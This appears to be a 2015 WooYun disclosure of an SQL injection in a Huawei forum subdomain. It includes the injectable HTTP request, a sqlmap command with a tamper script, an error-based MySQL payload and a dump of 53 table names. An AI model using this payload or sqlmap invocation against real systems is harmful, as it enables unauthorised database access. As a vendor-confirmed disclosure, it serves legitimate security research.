当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150541

漏洞标题:华为某子域名存在SQL注入

相关厂商:华为技术有限公司

漏洞作者: Jannock

提交时间:2015-10-30 10:45

修复时间:2015-12-14 11:26

公开时间:2015-12-14 11:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-30: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开

简要描述:

华为某子域名存在SQL注入

详细说明:

GET /cn/forumimage/index.php?app=stat&mod=VideoStat&act=insertRecord&uid=-1&targetId=0&targetTitle=gfhgfh&type=paper\&targetAction=,1,0,if((1=1 *),1,1),0,0,0,0,%23&source=windows&action=trace HTTP/1.1
Host: xinsheng-image.huawei.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-HK,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Forwarded-For: 192.168.1.1
Cookie: _ga=GA1.2.393988089.1446012893; s_fid=079C1ABA72D5B6C4-13A758BCA62CD20D; __utma=92496004.393988089.1446012893.1446012902.1446012902.1; __utmz=92496004.1446012902.1.1.utmcsr=huawei.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/; bfdid=b0605254007bf9520001d2440014c24056307fe8; HWFORUM_SESSION=jnms6co53phe1idna2jbhvdos1; forum-guest=true; TS_think_language=zh-cn
Connection: keep-alive


经典的过滤错误。 “\”

漏洞证明:

python sqlmap.py -r 1.txt --dbms=mysql --technique=E --tamper space2mysqlblank -D forumlog --tables
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150928}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility t
pplicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this pr
[*] starting at 10:32:20
1.txt
[10:32:20] [INFO] parsing HTTP request from '1.txt'
1.txt
[10:32:20] [INFO] loading tamper script 'space2mysqlblank'
[10:32:20] [WARNING] tamper script 'space2mysqlblank' is only meant to be run against MySQL
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[10:32:21] [INFO] testing connection to the target URL
[10:32:22] [INFO] heuristics detected web page charset 'ascii'
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yo
want to merge them in futher requests? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://xinsheng-image.huawei.com:80/cn/forumimage/index.php?app=stat&mod=VideoStat&act=insertRecord&uid=-1&targetId=0&targetT
type=paper\&targetAction=,1,0,if((1=1 ) AND (SELECT 9940 FROM(SELECT COUNT(*),CONCAT(0x716a707671,(SELECT (ELT(9940=9940,1))),0x7170627871
0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6564=6564),1,1),0,0,0,0,#&source=windows&action=trace
---
[10:32:23] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[10:32:23] [INFO] testing MySQL
[10:32:24] [INFO] confirming MySQL
[10:32:24] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.13, Apache 2.2.17
back-end DBMS: MySQL >= 5.0.0
[10:32:24] [INFO] fetching tables for database: 'forumlog'
[10:32:24] [INFO] the SQL query used returns 53 entries
[10:32:24] [INFO] retrieved: ts_app_login_log
[10:32:25] [INFO] retrieved: ts_forum_log_2015_10
[10:32:25] [INFO] retrieved: ts_forum_viewcount
[10:32:25] [INFO] retrieved: ts_online
[10:32:26] [INFO] retrieved: ts_online_action_daily_stat_app
[10:32:26] [INFO] retrieved: ts_online_action_daily_stat_user
[10:32:26] [INFO] retrieved: ts_online_action_daily_stat_user_2008
[10:32:27] [INFO] retrieved: ts_online_action_daily_stat_user_2009
[10:32:27] [INFO] retrieved: ts_online_action_daily_stat_user_2010
[10:32:28] [INFO] retrieved: ts_online_action_daily_stat_user_2011
[10:32:28] [INFO] retrieved: ts_online_action_daily_stat_user_2012
[10:32:28] [INFO] retrieved: ts_online_action_daily_stat_user_2013
[10:32:29] [INFO] retrieved: ts_online_action_daily_stat_user_2014
[10:32:29] [INFO] retrieved: ts_online_action_daily_stat_user_pv
[10:32:29] [INFO] retrieved: ts_online_action_daily_stat_user_pv_2011
[10:32:30] [INFO] retrieved: ts_online_action_daily_stat_user_pv_2012
[10:32:30] [INFO] retrieved: ts_online_action_daily_stat_user_pv_2014
[10:32:31] [INFO] retrieved: ts_online_action_map
[10:32:31] [INFO] retrieved: ts_online_data
[10:32:31] [INFO] retrieved: ts_online_logs
[10:32:32] [INFO] retrieved: ts_online_logs_2012_06_bk
[10:32:32] [INFO] retrieved: ts_online_logs_2012_12
[10:32:32] [INFO] retrieved: ts_online_logs_2014_01
[10:32:33] [INFO] retrieved: ts_online_logs_2014_02
[10:32:33] [INFO] retrieved: ts_online_logs_2014_03
[10:32:33] [INFO] retrieved: ts_online_logs_2014_04
[10:32:34] [INFO] retrieved: ts_online_logs_2014_05
[10:32:34] [INFO] retrieved: ts_online_logs_2014_06
[10:32:35] [INFO] retrieved: ts_online_logs_2014_07
[10:32:35] [INFO] retrieved: ts_online_logs_2014_08
[10:32:36] [INFO] retrieved: ts_online_logs_2014_09
[10:32:36] [INFO] retrieved: ts_online_logs_2014_10
[10:32:36] [INFO] retrieved: ts_online_logs_2014_11
[10:32:37] [INFO] retrieved: ts_online_logs_2014_12
[10:32:37] [INFO] retrieved: ts_online_logs_2015_01
[10:32:37] [INFO] retrieved: ts_online_logs_2015_02
[10:32:38] [INFO] retrieved: ts_online_logs_2015_03
[10:32:38] [INFO] retrieved: ts_online_logs_2015_04
[10:32:38] [INFO] retrieved: ts_online_logs_2015_05
[10:32:39] [INFO] retrieved: ts_online_logs_2015_06
[10:32:39] [INFO] retrieved: ts_online_logs_2015_07
[10:32:40] [INFO] retrieved: ts_online_logs_2015_08
[10:32:40] [INFO] retrieved: ts_online_logs_2015_09
[10:32:40] [INFO] retrieved: ts_online_logs_2015_10
[10:32:41] [INFO] retrieved: ts_online_schedule_stat
[10:32:41] [INFO] retrieved: ts_online_stats
[10:32:41] [INFO] retrieved: ts_online_user_depart
[10:32:42] [INFO] retrieved: ts_online_user_frequency_daily
[10:32:42] [INFO] retrieved: ts_online_user_frequency_month
[10:32:42] [INFO] retrieved: ts_online_user_frequency_week
[10:32:43] [INFO] retrieved: ts_online_user_frequency_year
[10:32:43] [INFO] retrieved: ts_online_widget
[10:32:44] [INFO] retrieved: video_online_logs
Database: forumlog
[53 tables]
+------------------------------------------+
| ts_app_login_log |
| ts_forum_log_2015_10 |
| ts_forum_viewcount |
| ts_online |
| ts_online_action_daily_stat_app |
| ts_online_action_daily_stat_user |
| ts_online_action_daily_stat_user_2008 |
| ts_online_action_daily_stat_user_2009 |
| ts_online_action_daily_stat_user_2010 |
| ts_online_action_daily_stat_user_2011 |
| ts_online_action_daily_stat_user_2012 |
| ts_online_action_daily_stat_user_2013 |
| ts_online_action_daily_stat_user_2014 |
| ts_online_action_daily_stat_user_pv |
| ts_online_action_daily_stat_user_pv_2011 |
| ts_online_action_daily_stat_user_pv_2012 |
| ts_online_action_daily_stat_user_pv_2014 |
| ts_online_action_map |
| ts_online_data |
| ts_online_logs |
| ts_online_logs_2012_06_bk |
| ts_online_logs_2012_12 |
| ts_online_logs_2014_01 |
| ts_online_logs_2014_02 |
| ts_online_logs_2014_03 |
| ts_online_logs_2014_04 |
| ts_online_logs_2014_05 |
| ts_online_logs_2014_06 |
| ts_online_logs_2014_07 |
| ts_online_logs_2014_08 |
| ts_online_logs_2014_09 |
| ts_online_logs_2014_10 |
| ts_online_logs_2014_11 |
| ts_online_logs_2014_12 |
| ts_online_logs_2015_01 |
| ts_online_logs_2015_02 |
| ts_online_logs_2015_03 |
| ts_online_logs_2015_04 |
| ts_online_logs_2015_05 |
| ts_online_logs_2015_06 |
| ts_online_logs_2015_07 |
| ts_online_logs_2015_08 |
| ts_online_logs_2015_09 |
| ts_online_logs_2015_10 |
| ts_online_schedule_stat |
| ts_online_stats |
| ts_online_user_depart |
| ts_online_user_frequency_daily |
| ts_online_user_frequency_month |
| ts_online_user_frequency_week |
| ts_online_user_frequency_year |
| ts_online_widget |
| video_online_logs |
+------------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 Jannock@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-30 11:25

厂商回复:

感谢一哥,已通知业务部门紧急整改。数据为统计数据。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-10-30 10:47 | loli 认证白帽子 ( 普通白帽子 | Rank:623 漏洞数:57 | 每个男人心中都住着一个叫小红的88号技师。)

    趁华为的淫在开会赶紧刷洞。。。

  2. 2015-10-30 10:53 | hecate ( 普通白帽子 | Rank:569 漏洞数:89 | ®高级安全工程师 | WooYun认证√)

    前排

  3. 2015-10-30 13:14 | rasca1 ( 实习白帽子 | Rank:53 漏洞数:16 | 菜鸟一只)

    前排

  4. 2015-10-30 14:33 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3650 漏洞数:282 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    他们在开沙龙啊